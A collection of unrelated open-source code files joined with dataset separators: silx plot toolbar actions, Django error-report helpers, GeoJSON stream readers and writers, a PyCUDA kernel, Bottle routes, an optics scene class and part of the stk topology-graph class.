self.setShortcut(qt.QKeySequence.ZoomIn) self.setShortcutContext(qt.Qt.WidgetShortcut) def _actionTriggered(self, checked=False): _applyZoomToPlot(self.plot, 1.1) class ZoomOutAction(PlotAction): """QAction performing a zoom-out on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ZoomOutAction, self).__init__( plot, icon='zoom-out', text='Zoom Out', tooltip='Zoom out the plot', triggered=self._actionTriggered, checkable=False, parent=parent) self.setShortcut(qt.QKeySequence.ZoomOut) self.setShortcutContext(qt.Qt.WidgetShortcut) def _actionTriggered(self, checked=False): _applyZoomToPlot(self.plot, 1. / 1.1) class XAxisAutoScaleAction(PlotAction): """QAction controlling X axis autoscale on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(XAxisAutoScaleAction, self).__init__( plot, icon='plot-xauto', text='X Autoscale', tooltip='Enable x-axis auto-scale when checked.\n' 'If unchecked, x-axis does not change when reseting zoom.', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.getXAxis().isAutoScale()) plot.getXAxis().sigAutoScaleChanged.connect(self.setChecked) def _actionTriggered(self, checked=False): self.plot.getXAxis().setAutoScale(checked) if checked: self.plot.resetZoom() class YAxisAutoScaleAction(PlotAction): """QAction controlling Y axis autoscale on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(YAxisAutoScaleAction, self).__init__( plot, icon='plot-yauto', text='Y Autoscale', tooltip='Enable y-axis auto-scale when checked.\n' 'If unchecked, y-axis does not change when reseting zoom.', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.getYAxis().isAutoScale()) plot.getYAxis().sigAutoScaleChanged.connect(self.setChecked) def _actionTriggered(self, checked=False): self.plot.getYAxis().setAutoScale(checked) if checked: self.plot.resetZoom() class XAxisLogarithmicAction(PlotAction): """QAction controlling X axis log scale on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(XAxisLogarithmicAction, self).__init__( plot, icon='plot-xlog', text='X Log. scale', tooltip='Logarithmic x-axis when checked', triggered=self._actionTriggered, checkable=True, parent=parent) self.axis = plot.getXAxis() self.setChecked(self.axis.getScale() == self.axis.LOGARITHMIC) self.axis.sigScaleChanged.connect(self._setCheckedIfLogScale) def _setCheckedIfLogScale(self, scale): self.setChecked(scale == self.axis.LOGARITHMIC) def _actionTriggered(self, checked=False): scale = self.axis.LOGARITHMIC if checked else self.axis.LINEAR self.axis.setScale(scale) class YAxisLogarithmicAction(PlotAction): """QAction controlling Y axis log scale on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(YAxisLogarithmicAction, self).__init__( plot, icon='plot-ylog', text='Y Log. scale', tooltip='Logarithmic y-axis when checked', triggered=self._actionTriggered, checkable=True, parent=parent) self.axis = plot.getYAxis() self.setChecked(self.axis.getScale() == self.axis.LOGARITHMIC) self.axis.sigScaleChanged.connect(self._setCheckedIfLogScale) def _setCheckedIfLogScale(self, scale): self.setChecked(scale == self.axis.LOGARITHMIC) def _actionTriggered(self, checked=False): scale = self.axis.LOGARITHMIC if checked else self.axis.LINEAR self.axis.setScale(scale) class GridAction(PlotAction): """QAction controlling grid mode on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param str gridMode: The grid mode to use in 'both', 'major'. See :meth:`.PlotWidget.setGraphGrid` :param parent: See :class:`QAction` """ def __init__(self, plot, gridMode='both', parent=None): assert gridMode in ('both', 'major') self._gridMode = gridMode super(GridAction, self).__init__( plot, icon='plot-grid', text='Grid', tooltip='Toggle grid (on/off)', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.getGraphGrid() is not None) plot.sigSetGraphGrid.connect(self._gridChanged) def _gridChanged(self, which): """Slot listening for PlotWidget grid mode change.""" self.setChecked(which != 'None') def _actionTriggered(self, checked=False): self.plot.setGraphGrid(self._gridMode if checked else None) class CurveStyleAction(PlotAction): """QAction controlling curve style on a :class:`.PlotWidget`. It changes the default line and markers style which updates all curves on the plot. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(CurveStyleAction, self).__init__( plot, icon='plot-toggle-points', text='Curve style', tooltip='Change curve line and markers style', triggered=self._actionTriggered, checkable=False, parent=parent) def _actionTriggered(self, checked=False): currentState = (self.plot.isDefaultPlotLines(), self.plot.isDefaultPlotPoints()) if currentState == (False, False): newState = True, False else: # line only, line and symbol, symbol only states = (True, False), (True, True), (False, True) newState = states[(states.index(currentState) + 1) % 3] self.plot.setDefaultPlotLines(newState[0]) self.plot.setDefaultPlotPoints(newState[1]) class ColormapAction(PlotAction): """QAction opening a ColormapDialog to update the colormap. Both the active image colormap and the default colormap are updated. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): self._dialog = None # To store an instance of ColormapDialog super(ColormapAction, self).__init__( plot, icon='colormap', text='Colormap', tooltip="Change colormap", triggered=self._actionTriggered, checkable=True, parent=parent) self.plot.sigActiveImageChanged.connect(self._updateColormap) self.plot.sigActiveScatterChanged.connect(self._updateColormap) def setColorDialog(self, colorDialog): """Set a specific color dialog instead of using the default dialog.""" assert(colorDialog is not None) assert(self._dialog is None) self._dialog = colorDialog self._dialog.visibleChanged.connect(self._dialogVisibleChanged) self.setChecked(self._dialog.isVisible()) @staticmethod def _createDialog(parent): """Create the dialog if not already existing :parent QWidget parent: Parent of the new colormap :rtype: ColormapDialog """ from silx.gui.dialog.ColormapDialog import ColormapDialog dialog = ColormapDialog(parent=parent) dialog.setModal(False) return dialog def _actionTriggered(self, checked=False): """Create a cmap dialog and update active image and default cmap.""" if self._dialog is None: self._dialog = self._createDialog(self.plot) self._dialog.visibleChanged.connect(self._dialogVisibleChanged) # Run the dialog listening to colormap change if checked is True: self._updateColormap() self._dialog.show() else: self._dialog.hide() def _dialogVisibleChanged(self, isVisible): self.setChecked(isVisible) def _updateColormap(self): if self._dialog is None: return image = self.plot.getActiveImage() if isinstance(image, items.ImageComplexData): # Specific init for complex images colormap = image.getColormap() mode = image.getComplexMode() if mode in (items.ImageComplexData.ComplexMode.AMPLITUDE_PHASE, items.ImageComplexData.ComplexMode.LOG10_AMPLITUDE_PHASE): data = image.getData( copy=False, mode=items.ImageComplexData.ComplexMode.PHASE) else: data = image.getData(copy=False) # Set histogram and range if any self._dialog.setData(data) elif isinstance(image, items.ColormapMixIn): # Set dialog from active image colormap = image.getColormap() # Set histogram and range if any self._dialog.setItem(image) else: # No active image or active image is RGBA, # Check for active scatter plot scatter = self.plot._getActiveItem(kind='scatter') if scatter is not None: colormap = scatter.getColormap() self._dialog.setItem(scatter) else: # No active data image nor scatter, # set dialog from default info colormap = self.plot.getDefaultColormap() # Reset histogram and range if any self._dialog.setData(None) self._dialog.setColormap(colormap) class ColorBarAction(PlotAction): """QAction opening the ColorBarWidget of the specified plot. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): self._dialog = None # To store an instance of ColorBar super(ColorBarAction, self).__init__( plot, icon='colorbar', text='Colorbar', tooltip="Show/Hide the colorbar", triggered=self._actionTriggered, checkable=True, parent=parent) colorBarWidget = self.plot.getColorBarWidget() old = self.blockSignals(True) self.setChecked(colorBarWidget.isVisibleTo(self.plot)) self.blockSignals(old) colorBarWidget.sigVisibleChanged.connect(self._widgetVisibleChanged) def _widgetVisibleChanged(self, isVisible): """Callback when the colorbar `visible` property change.""" if self.isChecked() == isVisible: return self.setChecked(isVisible) def _actionTriggered(self, checked=False): """Create a cmap dialog and update active image and default cmap.""" colorBarWidget = self.plot.getColorBarWidget() if not colorBarWidget.isHidden() == checked: return self.plot.getColorBarWidget().setVisible(checked) class KeepAspectRatioAction(PlotAction): """QAction controlling aspect ratio on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): # Uses two images for checked/unchecked states self._states = { False: (icons.getQIcon('shape-circle-solid'), "Keep data aspect ratio"), True: (icons.getQIcon('shape-ellipse-solid'), "Do no keep data aspect ratio") } icon, tooltip = self._states[plot.isKeepDataAspectRatio()] super(KeepAspectRatioAction, self).__init__( plot, icon=icon, text='Toggle keep aspect ratio', tooltip=tooltip, triggered=self._actionTriggered, checkable=False, parent=parent) plot.sigSetKeepDataAspectRatio.connect( self._keepDataAspectRatioChanged) def _keepDataAspectRatioChanged(self, aspectRatio): """Handle Plot set keep aspect ratio signal""" icon, tooltip = self._states[aspectRatio] self.setIcon(icon) self.setToolTip(tooltip) def _actionTriggered(self, checked=False): # This will trigger _keepDataAspectRatioChanged self.plot.setKeepDataAspectRatio(not self.plot.isKeepDataAspectRatio()) class YAxisInvertedAction(PlotAction): """QAction controlling Y orientation on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): # Uses two images for checked/unchecked states self._states = { False: (icons.getQIcon('plot-ydown'), "Orient Y axis downward"), True: (icons.getQIcon('plot-yup'), "Orient Y axis upward"), } icon, tooltip = self._states[plot.getYAxis().isInverted()] super(YAxisInvertedAction, self).__init__( plot, icon=icon, text='Invert Y Axis', tooltip=tooltip, triggered=self._actionTriggered, checkable=False, parent=parent) plot.getYAxis().sigInvertedChanged.connect(self._yAxisInvertedChanged) def _yAxisInvertedChanged(self, inverted): """Handle Plot set y axis inverted signal""" icon, tooltip = self._states[inverted] self.setIcon(icon) self.setToolTip(tooltip) def _actionTriggered(self, checked=False): # This will trigger _yAxisInvertedChanged yAxis = self.plot.getYAxis() yAxis.setInverted(not yAxis.isInverted()) class CrosshairAction(PlotAction): """QAction toggling crosshair cursor on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param str color: Color to use to draw the crosshair :param int linewidth: Width of the crosshair cursor :param str linestyle: Style of line. See :meth:`.Plot.setGraphCursor` :param parent: See :class:`QAction` """ def __init__(self, plot, color='black', linewidth=1, linestyle='-', parent=None): self.color = color """Color used to draw the crosshair (str).""" self.linewidth = linewidth """Width of the crosshair cursor (int).""" self.linestyle = linestyle """Style of line of the cursor (str).""" super(CrosshairAction, self).__init__( plot, icon='crosshair', text='Crosshair Cursor', tooltip='Enable crosshair cursor when checked', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.getGraphCursor() is not None) plot.sigSetGraphCursor.connect(self.setChecked) def _actionTriggered(self, checked=False): self.plot.setGraphCursor(checked, color=self.color, linestyle=self.linestyle, linewidth=self.linewidth) class PanWithArrowKeysAction(PlotAction): """QAction toggling pan with arrow keys on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(PanWithArrowKeysAction, self).__init__( plot, icon='arrow-keys', text='Pan with arrow keys', tooltip='Enable pan with arrow keys when checked', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.isPanWithArrowKeys()) plot.sigSetPanWithArrowKeys.connect(self.setChecked) def _actionTriggered(self, checked=False): self.plot.setPanWithArrowKeys(checked) class ShowAxisAction(PlotAction): """QAction controlling axis visibility on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): tooltip = 'Show plot axis when checked, otherwise hide them' PlotAction.__init__(self, plot, icon='axis', text='show axis', tooltip=tooltip, triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(self.plot._backend.isAxesDisplayed()) plot._sigAxesVisibilityChanged.connect(self.setChecked) def _actionTriggered(self, checked=False): self.plot.setAxesDisplayed(checked)
StarcoderdataPython
1655338
from tests.fixtures import * # noqa: F401
StarcoderdataPython
45296
# coding: utf-8 import logging import re from itertools import chain from textwrap import TextWrapper from django.core import mail from django.test import TestCase as DjangoTestCase from django.views import debug from six import string_types from six.moves.urllib.parse import urlparse, urlunparse from threadlocals.threadlocals import set_thread_variable from .celery import app as celery_app # patch the default formatter to use a unicode format string logging._defaultFormatter = logging.Formatter("%(message)s") logger = logging.getLogger(__name__) HIDDEN_SETTING = re.compile(r"URL|BACKEND") class TestCase(DjangoTestCase): """ Overrides the default Django TestCase to clear out the threadlocal request variable during class setUp and tearDown. """ @classmethod def setUpClass(cls): super(TestCase, cls).setUpClass() set_thread_variable("request", None) @classmethod def tearDownClass(cls): set_thread_variable("request", None) super(TestCase, cls).tearDownClass() def setUp(self): super(TestCase, self).setUp() set_thread_variable("request", None) def tearDown(self): set_thread_variable("request", None) super(TestCase, self).tearDown() def monkey_patch_cleanse_setting(): # monkey-patch django.views.debug.cleanse_setting to check for CELERY_RESULT_BACKEND _cleanse_setting = debug.cleanse_setting def cleanse_setting(key, value): cleansed = _cleanse_setting(key, value) if HIDDEN_SETTING.search(key): try: parsed = None if isinstance(value, string_types): parsed = urlparse(value) if parsed and parsed.password: # urlparse returns a read-only tuple, use a list to rewrite parts parsed_list = list(parsed) parsed_list[1] = parsed.netloc.replace( f":{parsed.password}", ":**********", 1 ) # put Humpty Dumpty back together again cleansed = urlunparse(parsed_list) except Exception: logger.exception("Exception cleansing URLs for error reporting") return cleansed debug.cleanse_setting = cleanse_setting def monkey_patch_mail_admins(): # monkey-patch django.core.mail.mail_admins to properly wrap long lines _mail_admins = mail.mail_admins def mail_admins(subject, message, *args, **kwargs): """ Wraps the mail_admins function from Django to wrap long lines in emails. The exim mail server used in EDD dis-allows lines longer than 998 bytes. """ wrapper = TextWrapper( width=79, break_on_hyphens=False, replace_whitespace=False, subsequent_indent=" ", ) message = "\n".join( chain(*(wrapper.wrap(line) for line in message.splitlines())) ) _mail_admins(subject, message, *args, **kwargs) mail.mail_admins = mail_admins monkey_patch_cleanse_setting() monkey_patch_mail_admins() __all__ = ("celery_app", "TestCase")
StarcoderdataPython
1760788
<reponame>granular-oss/geostream<filename>geostream/v3.py<gh_stars>1-10 import gzip import typing as typ import simplejson as json from geostream.base import Feature, GeoStreamReader, GeoStreamReverseReader, GeoStreamWriter, Properties class GeoStreamReaderV3(GeoStreamReader): """ Stream header accessors and iterator over a readable binary stream of compressed GeoJSON Features """ GEOSTREAM_SCHEMA_VERSION = 3 def _load_properties(self, buffer: bytes) -> Properties: return json.loads(buffer) def _load_feature(self, data: bytes) -> Feature: return self._construct_feature(json.loads(gzip.decompress(data).decode())) class GeoStreamReverseReaderV3(GeoStreamReverseReader): """ Stream header accessors and backwards iterator over a readable binary stream of compressed GeoJSON Features """ GEOSTREAM_SCHEMA_VERSION = 3 def _load_properties(self, buffer: bytes) -> Properties: return json.loads(buffer) def _load_feature(self, data: bytes) -> Feature: return self._construct_feature(json.loads(gzip.decompress(data).decode())) class GeoStreamWriterV3(GeoStreamWriter): """ Binary stream writer provides methods to write a header followed by compressed GeoJSON Features """ GEOSTREAM_SCHEMA_VERSION: int = 3 def _dump_properties(self, properties: Properties) -> typ.Optional[bytes]: if properties is not None: return json.dumps(properties).encode() else: return None def _dump_feature(self, feature: Feature) -> bytes: feature.wkb # Validity check return gzip.compress(json.dumps(feature).encode())
StarcoderdataPython
3347400
from __future__ import division import numpy as np import pycuda.driver as drv from pycuda.compiler import SourceModule import pycuda.autoinit kernel_code_div_eigenenergy_cuda = """ #include<stdio.h> #include<stdlib.h> __global__ void calc_XXVV_gpu(float *nm2v_re, float *nm2v_im, int nm2v_dim1, int nm2v_dim2, float *ksn2e, float *ksn2f, int nfermi, int vstart, int ksn2e_dim, double omega_re, double omega_im) { int i = blockIdx.x * blockDim.x + threadIdx.x; //nocc int j = blockIdx.y * blockDim.y + threadIdx.y; //nvirt int m, index; float en, em, fn, fm; double alpha, beta, a, b; if (i < nfermi) { en = ksn2e[i]; fn = ksn2f[i]; if ( (j < ksn2e_dim - i -1)) { m = j + i + 1 - vstart; if (m > 0) { em = ksn2e[i+1+j]; fm = ksn2f[i+1+j]; a = (omega_re - (em-en))*(omega_re - (em-en)) + omega_im*omega_im; b = (omega_re + (em-en))*(omega_re + (em-en)) + omega_im*omega_im; alpha = (b*(omega_re - (em-en)) - a*(omega_re + (em-en)))/(a*b); beta = omega_im*(a-b)/(a*b); index = i*nm2v_dim2 + m; nm2v_re[index] = (fn - fm) * (nm2v_re[index]*alpha - nm2v_im[index]*beta); nm2v_im[index] = (fn - fm) * (nm2v_re[index]*beta + nm2v_im[index]*alpha); } } } } """ def div_eigenenergy_cuda(ksn2e, ksn2f, nfermi, vstart, comega, nm2v_re, nm2v_im, block_size, grid_size): block = (int(block_size[0]), int(block_size[1]), int(1)) grid = (int(grid_size[0]), int(grid_size[1])) mod = SourceModule(kernel_code_div_eigenenergy_cuda) calc_XXVV = mod.get_function("calc_XXVV_gpu") calc_XXVV(nm2v_re, nm2v_im, np.int32(nm2v_re.shape[0]), np.int32(nm2v_re.shape[1]), ksn2e, ksn2f, np.int32(nfermi), np.int32(vstart), np.int32(ksn2e.shape[0]), np.float64(comega.real), np.float64(comega.imag), block = block, grid = grid)
StarcoderdataPython
3359561
""" Routes and views for the bottle application. """ import os import json from bottle import route, view, static_file from datetime import datetime config = { "secret_key" : "my developer secret value" } if os.getenv("MY_CONFIG"): # you can define the setting in your Azure Web App # by setting "MY_CONFIG" in the Appsettings. config = json.loads(os.getenv("MY_CONFIG")) @route('/static/<filepath:path>') def server_static(filepath): """Handler for static files, used with the development server. When running under a production server such as IIS or Apache, the server should be configured to serve the static files.""" return static_file(filepath, root="static/") @route('/') @route('/home') @view('index') def home(): """Renders the home page.""" return dict( year=datetime.now().year, secret = config.get("secret_key") ) @route('/contact') @view('contact') def contact(): """Renders the contact page.""" return dict( title='Contact', message='Your contact page.', year=datetime.now().year ) @route('/about') @view('about') def about(): """Renders the about page.""" return dict( title='About', message='Your application description page.', year=datetime.now().year )
StarcoderdataPython
3329523
import numpy as np import manifolds from manifolds import Scene as CppScene from manifolds import Ray2f, Shape from misc import * from path import Path from draw import * class Scene: def __init__(self, shapes): self.shapes = shapes self.offset = [0, 0] self.zoom = 1.0 self.scale = 1.0 self.start_u_default = 0 self.start_u_current = 0 self.start_angle_default = 0 self.start_angle_current = 0 self.end_u_default = 0 self.end_u_current = 0 self.spec_u_default = 0 self.spec_u_current = 0 self.n_bounces_default = 1 self.cpp_scene = CppScene() shape_id = 0 for s in shapes: s.id = shape_id self.cpp_scene.add_shape(s) shape_id += 1 def set_start(self, start_u, start_angle, end_u=0.5, spec_u=0.5): self.start_u_default = start_u self.start_angle_default = start_angle self.end_u_default = end_u self.spec_u_default = spec_u self.start_u_current = start_u self.start_angle_current = start_angle self.end_u_current = end_u self.spec_u_current = spec_u def start_shape(self): return self.cpp_scene.start_shape() def end_shape(self): return self.cpp_scene.end_shape() def first_specular_shape(self): return self.cpp_scene.first_specular_shape() def draw(self, ctx): for shape in self.shapes: if shape.type == Shape.Type.Emitter: for t in np.linspace(0, 1, 10): it = shape.sample_position(t) draw_arrow(ctx, it.p, it.n, nvg.RGB(255, 255, 180), scale=0.5, length=0.03) self.cpp_scene.draw(ctx) def ray_intersect(self, ray): # Trace ray against C++ representation it = self.cpp_scene.ray_intersect(ray) if it.is_valid(): # We now need to track the relative IOR change at this interaction wi = -ray.d it.eta = it.shape.eta it.n_offset = np.array([0, 1]) return it def sample_start_position(self, u): it = self.cpp_scene.start_shape().sample_position(u) it.eta = it.shape.eta it.n_offset = np.array([0, 1]) return it def sample_end_position(self, u): it = self.cpp_scene.end_shape().sample_position(u) it.eta = it.shape.eta it.n_offset = np.array([0, 1]) return it def sample_spec_position(self, u): it = self.cpp_scene.first_specular_shape().sample_position(u) it.eta = it.shape.eta it.n_offset = np.array([0, 1]) return it def sample_path(self): it = self.sample_start_position(self.start_u_current) path = Path() path.append(it) theta = np.radians(self.start_angle_current) wo = [np.cos(theta), np.sin(theta)] if wo @ it.n < 0.0: return path while True: ray = Ray2f(it.p, wo) it = self.ray_intersect(ray) wi = -ray.d path.append(it) m = it.s * it.n_offset[0] + it.n * it.n_offset[1] if it.shape.type == Shape.Type.Reflection: if wi @ it.n < 0: break wo = reflect(wi, m) elif it.shape.type == Shape.Type.Refraction: wo = refract(wi, m, it.shape.eta) else: break if not wo[0]: break wo = wo[1] return path def sample_seed_path(self, n_spec_bounces=1): path = Path() it1 = self.sample_start_position(self.start_u_current) it2 = self.sample_spec_position(self.spec_u_current) wo = normalize(it2.p - it1.p) if wo @ it1.n < 0.0: return path ray = Ray2f(it1.p, wo) it = self.ray_intersect(ray) if not it.is_valid() or (it.shape != it2.shape): return path it2 = it path.append(it1) path.append(it) while True: wi = -wo if len(path) - 1 >= n_spec_bounces: break m = it.s * it.n_offset[0] + it.n * it.n_offset[1] if it.shape.type == Shape.Type.Reflection: if wi @ it.n < 0: break wo = reflect(wi, m) elif it.shape.type == Shape.Type.Refraction: wo = refract(wi, m, it.shape.eta) else: print("Should not happen!!") break if not wo[0]: break wo = wo[1] ray = Ray2f(it.p, wo) it = self.ray_intersect(ray) if not (it.shape.type == Shape.Type.Reflection or it.shape.type == Shape.Type.Refraction): break path.append(it) it3 = self.sample_end_position(self.end_u_current) path.append(it3) if len(path) != n_spec_bounces + 2: return Path() return path def sample_mnee_seed_path(self): path = Path() it1 = self.sample_start_position(self.start_u_current) it3 = self.sample_end_position(self.end_u_current) wo = normalize(it3.p - it1.p) if wo @ it1.n < 0.0: return path path.append(it1) it = it1 while True: ray = Ray2f(it.p, wo) it = self.ray_intersect(ray) if it.shape.type == Shape.Type.Reflection: break elif it.shape.type == Shape.Type.Refraction: pass else: break path.append(it) it3 = self.sample_end_position(self.end_u_current) path.append(it3) return path def reproject_path_me(self, offset_vertices): path = Path() p0 = offset_vertices[0] t0 = self.cpp_scene.start_shape().project(p0) it = self.cpp_scene.start_shape().sample_position(t0) path.append(it) p1 = offset_vertices[1] wo = normalize(p1 - p0) while True: ray = Ray2f(it.p, wo) it = self.ray_intersect(ray) wi = -ray.d path.append(it) m = it.s * it.n_offset[0] + it.n * it.n_offset[1] if it.shape.type == Shape.Type.Reflection: if wi @ it.n < 0: break wo = reflect(wi, m) elif it.shape.type == Shape.Type.Refraction: wo = refract(wi, m, it.shape.eta) else: break if not wo[0]: break wo = wo[1] return path def reproject_path_sms(self, offset_vertices, previous_path, n_spec_bounces=1): path = Path() p1 = offset_vertices[0] t1 = self.cpp_scene.start_shape().project(p1) it1 = self.cpp_scene.start_shape().sample_position(t1) p2 = offset_vertices[1] wo = normalize(p2 - p1) if wo @ it1.n < 0.0: return path ray = Ray2f(p1, wo) it2 = self.ray_intersect(ray) if it2.shape.id != self.cpp_scene.first_specular_shape().id: return path it2.n_offset = previous_path.vertices[1].n_offset path.append(it1) path.append(it2) it = it2 while True: wi = -wo if len(path) - 1 >= n_spec_bounces: break m = it.s * it.n_offset[0] + it.n * it.n_offset[1] if it.shape.type == Shape.Type.Reflection: if wi @ it.n < 0: break wo = reflect(wi, m) elif it.shape.type == Shape.Type.Refraction: wo = refract(wi, m, it.shape.eta) else: print("Should not happen!!") break if not wo[0]: break wo = wo[1] ray = Ray2f(it.p, wo) it = self.ray_intersect(ray) if not (it.shape.type == Shape.Type.Reflection or it.shape.type == Shape.Type.Refraction): break if len(path) > len(previous_path): break it.n_offset = previous_path.vertices[len(path)].n_offset path.append(it) it3 = self.sample_end_position(self.end_u_current) path.append(it3) if len(path) != n_spec_bounces + 2: return Path() return path
StarcoderdataPython
47128
<reponame>stevenbennett96/stk<filename>src/stk/molecular/topology_graphs/topology_graph/topology_graph/topology_graph.py """ Topology Graph ============== """ from __future__ import annotations import typing from collections import abc from functools import partial import numpy as np from stk.utilities import flatten from ....molecules import BuildingBlock from ....reactions import ReactionFactory from ..construction_result import ConstructionResult from ..construction_state import ConstructionState from ..edge import Edge from ..edge_group import EdgeGroup from ..optimizers import Optimizer from ..vertex import Vertex from .implementations import ( _Parallel, _Serial, _TopologyGraphImplementation, ) _TopologyGraphT = typing.TypeVar( '_TopologyGraphT', bound='TopologyGraph', ) class TopologyGraph: """ An abstract base class for topology graphs. It is responsible for the construction of molecules. To create a new topology graph, you want to subclass and implement this abstract base class. Notes: *Adding New Topology Graphs* You might notice that some of the methods of this abstract base class are implemented. This is purely for convenience when implementing subclasses. The implemented public methods are simply default implementations, which can safely be ignored or overridden, when implementing subclasses. Any private methods are implementation details of these default implementations. Many classes, such as :class:`.Vertex`, :class:`.Edge`, :class:`.EdgeGroup` and :class:`.ConstructionState`, exist as implementation details of this default :class:`.TopologyGraph` implementation. You could ignore all of them, and define a new :meth:`.construct` method from scratch. In fact, your topology graph does not have to be represented as a graph at all. However, using the default implementation of :class:`.TopologyGraph` makes it significantly easier to implement a construction process. When using the default implementation of :class:`.TopologyGraph`, you mostly just need to implement a :class:`.Vertex` subclass, which is much easier than figuring out the whole construction process from scratch. In addition, you get benefits like parallel construction for free, as it is included in the default implementation. Typically, adding a new topology graph will involve implementing any pure virtual methods of :class:`.TopologyGraph`, in a new subclass, as well as implementing any pure virtual methods of :class:`.Vertex`, again in a new subclass. Combined, this is just a handful of simple methods to implement. Sometimes, rarely, you might also want to subclass :class:`.ConstructionState`, when you want to add additional hooks during construction, by extending the methods of this class. If you do this, make sure to override :meth:`._get_construction_state` to return your subclass of :class:`.ConstructionState`, rather than the base class, as is done by default. You can subclass and extend the methods of any class as you wish, but it would be unusual if this doesn't cover all your requirements. *The Default Implementation* The default implementation of :class:`.TopologyGraph` represents the constructed molecule through a graph. The vertices indicate where building blocks are placed and the edges indicate which building blocks have bonds formed between them by the construction process. :class:`.Vertex` instances are responsible for placing the building block molecules. By initializing the vertices with different parameters, you can alter how they position the building block molecules, and therefore allow the user to easily specify a different structural isomer. Once a building block is placed on a vertex, the functional groups on the building block must be mapped to the different edges connected to the vertex. The number of functional groups in the building block must match the number of edges connected to the vertex. Once the functional groups are mapped to edges, the edges are used to perform reactions on the building blocks. Edges are grouped in an :class:`.EdgeGroup`, and all functional groups present in the edge group are reacted together. Normally, unless you are doing something very exotic, an :class:`.EdgeGroup` will hold just one :class:`.Edge`, and the two functional groups on that edge will be reacted together through a single :class:`.Reaction`. This reaction will normally add the bonds which are required to form the joined-up constructed molecule, but note that it does not have to add any bonds at all. In addition, a :class:`.Reaction` can add and remove atoms from the constructed molecule. Which reaction is selected to join the functional groups depends on the :class:`.ReactionFactory` given to the :class:`.TopologyGraph` during initialization. Once this is done, you have a :class:`.ConstructedMolecule`. Examples: *Subclass Implementation* The source code of subclasses, listed in :mod:`~.topology_graph.topology_graph.topology_graph`, can serve as good examples. *Changing the Building Blocks of a Topology Graph* To change the building blocks used by a topology graph you can use :meth:`.with_building_blocks` to get a clone of the topology graph holding the new building blocks .. testcode:: changing-the-building-blocks-of-a-topology-graph import stk bb1 = stk.BuildingBlock('BrCCBr', [stk.BromoFactory()]) bb2 = stk.BuildingBlock('BrCCCBr', [stk.BromoFactory()]) linear = stk.polymer.Linear( building_blocks=(bb1, bb2), repeating_unit='A', num_repeating_units=15, ) bb3 = stk.BuildingBlock('BrCNCBr', [stk.BromoFactory()]) # All bb1 instances are replaced by bb3, but bb2 remains # in place. clone = linear.with_building_blocks({ bb1: bb3, }) """ _implementation: _TopologyGraphImplementation def __init__( self, building_block_vertices: dict[ BuildingBlock, abc.Sequence[Vertex], ], edges: tuple[Edge, ...], reaction_factory: ReactionFactory, construction_stages: tuple[ # TODO: Use typing.Callable here for now so that Sphinx # generates hyperlinks in the compiled docs. This should # eventually be replaced by abc.Callable. typing.Callable[[Vertex], bool], ... ], num_processes: int, optimizer: Optimizer, edge_groups: typing.Optional[tuple[EdgeGroup, ...]] = None, ) -> None: """ Initialize an instance of :class:`.TopologyGraph`. Parameters: building_block_vertices: Maps each :class:`.BuildingBlock` to be placed, to the :class:`.Vertex` instances, on which it should be placed. edges: The edges which make up the topology graph. reaction_factory: Used to pick which :class:`.Reaction` is used on each :class:`.EdgeGroup` of the topology graph. construction_stages: A collection of :class:`~collections.abc.Callable`, each of which takes a :class:`.Vertex` and returns ``True`` or ``False``. If the first :class:`~collections.abc.Callable` is applied to a vertex in the topology graph, and the result is ``True``, that vertex is a part of the first construction stage. The second :class:`callable` is then applied to all vertices not in the first stage and those which return ``True`` belong to the second stage and so on. Vertices which belong to the same construction stage all place building blocks together in parallel, before placement is done by any vertices which are part of a later stage. This breaks down parallel construction into serial stages if synchronization between stages is needed. If the topology graph is performing construction serially, then all vertices which belong to an earlier stage will place their building block before those at a later stage. num_processes: The number of parallel processes to create during :meth:`construct`. optimizer: Used to optimize the structure of the constructed molecule. edge_groups: The edge groups of the topology graph, if ``None``, every :class:`.Edge` is in its own edge group. """ self._scale = scale = self._get_scale(building_block_vertices) def apply_scale(item): return item.with_scale(scale) self._building_block_vertices = { building_block: tuple(map(apply_scale, vertices)) for building_block, vertices in building_block_vertices.items() } self._edges = tuple(map(apply_scale, edges)) self._reaction_factory = reaction_factory if num_processes == 1: self._implementation = _Serial( stages=tuple(self._get_stages(construction_stages)), ) else: self._implementation = _Parallel( stages=tuple(self._get_stages(construction_stages)), num_processes=num_processes, ) if edge_groups is None: edge_groups = tuple( EdgeGroup((edge, )) for edge in self._edges ) self._edge_groups = edge_groups self._optimizer = optimizer def _with_building_blocks( self: _TopologyGraphT, building_block_map: dict[BuildingBlock, BuildingBlock], ) -> _TopologyGraphT: """ Modify the topology graph. """ # The original scaling first needs to be removed, so that when # the scale is recalculated with the new building blocks, it # has the same 